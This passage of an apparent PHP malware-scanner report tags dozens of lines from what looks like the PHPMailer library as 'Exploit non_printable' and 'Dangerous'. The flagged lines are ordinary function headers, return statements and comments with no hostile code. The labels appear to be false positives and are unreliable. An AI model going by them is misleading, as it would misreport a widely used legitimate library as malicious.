</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3288</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addStringAttachment</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3327</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True on successfully adding an attachment</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3329</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addEmbeddedImage</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$cid</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$disposition </span><span style="color: #007700">= </span><span style="color: #DD0000">'inline'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return-</span><span style="color: #0000BB">Path</span><span style="color: #007700">) </span><span style="color: #0000BB">of the message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3374</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addStringEmbeddedImage</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3406</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">inlineImageExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3420</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">attachmentExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 342</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return-</span><span style="color: #0000BB">Path of the message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3434</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">alternativeExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3436</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !empty(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">AltBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3445</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearQueuedAddresses</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3459</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 345</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">path header</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3472</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearCCs</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3485</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearBCCs</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3498</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearReplyTos</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 349</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ReturnPath </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAllRecipients</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3521</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAttachments</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3530</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearCustomHeaders</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3541</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setError</span><span style="color: #007700">(</span><span style="color: #0000BB">$msg</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3563</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">an RFC 822 formatted date</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3568</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">rfcDate</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3573</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">date</span><span style="color: #007700">(</span><span style="color: #DD0000">'D, j M Y H:i:s O'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3578</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns </span><span style="color: #DD0000">'localhost.localdomain' </span><span style="color: #007700">if </span><span style="color: #0000BB">unknown</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3582</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">serverHostname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3589</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'gethostname'</span><span style="color: #007700">) && </span><span style="color: #0000BB">gethostname</span><span style="color: #007700">() !== </span><span style="color: #0000BB">false</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3603</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">lang</span><span style="color: #007700">(</span><span style="color: #0000BB">$key</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3614</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">[</span><span style="color: #0000BB">$key</span><span style="color: #007700">] . </span><span style="color: #DD0000">' https://github.com/PHPMailer/PHPMailer/wiki/Troubleshooting'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3616</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">[</span><span style="color: #0000BB">$key</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3618</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the key </span><span style="color: #007700">as </span><span style="color: #0000BB">a fallback</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3619</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$key</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3626</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True </span><span style="color: #007700">if </span><span style="color: #0000BB">an error did occur</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3628</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isError</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3630</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">error_count </span><span style="color: #007700">> </span><span style="color: #0000BB">0</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3640</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fixEOL</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3648</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$nstr</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3660</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addCustomHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3671</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns all custom headers</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3674</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getCustomHeaders</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3676</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">CustomHeader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3693</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string $message The transformed message Body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3695</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">msgHTML</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$basedir </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$advanced </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3708</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3766</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">Body</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3772</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">used a bundled advanced converter</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3779</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$html</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$converter</span><span style="color: #007700">-></span><span style="color: #0000BB">get_text</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3789</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">html2text</span><span style="color: #007700">(</span><span style="color: #0000BB">$html</span><span style="color: #007700">, </span><span style="color: #0000BB">$advanced </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3792</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">(</span><span style="color: #0000BB">$advanced</span><span style="color: #007700">, </span><span style="color: #0000BB">$html</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3794</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">html_entity_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3805</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string MIME type of file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3808</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_mime_types</span><span style="color: #007700">(</span><span style="color: #0000BB">$ext </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3911</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$mimes</span><span style="color: #007700">[</span><span style="color: #0000BB">strtolower</span><span style="color: #007700">(</span><span style="color: #0000BB">$ext</span><span style="color: #007700">)];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3913</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'application/octet-stream'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3923</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">filenameToType</span><span style="color: #007700">(</span><span style="color: #0000BB">$filename</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3931</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">_mime_types</span><span style="color: #007700">(</span><span style="color: #0000BB">$pathinfo</span><span style="color: #007700">[</span><span style="color: #DD0000">'extension'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3938</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">pathinfo</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#107461</span>
</span>
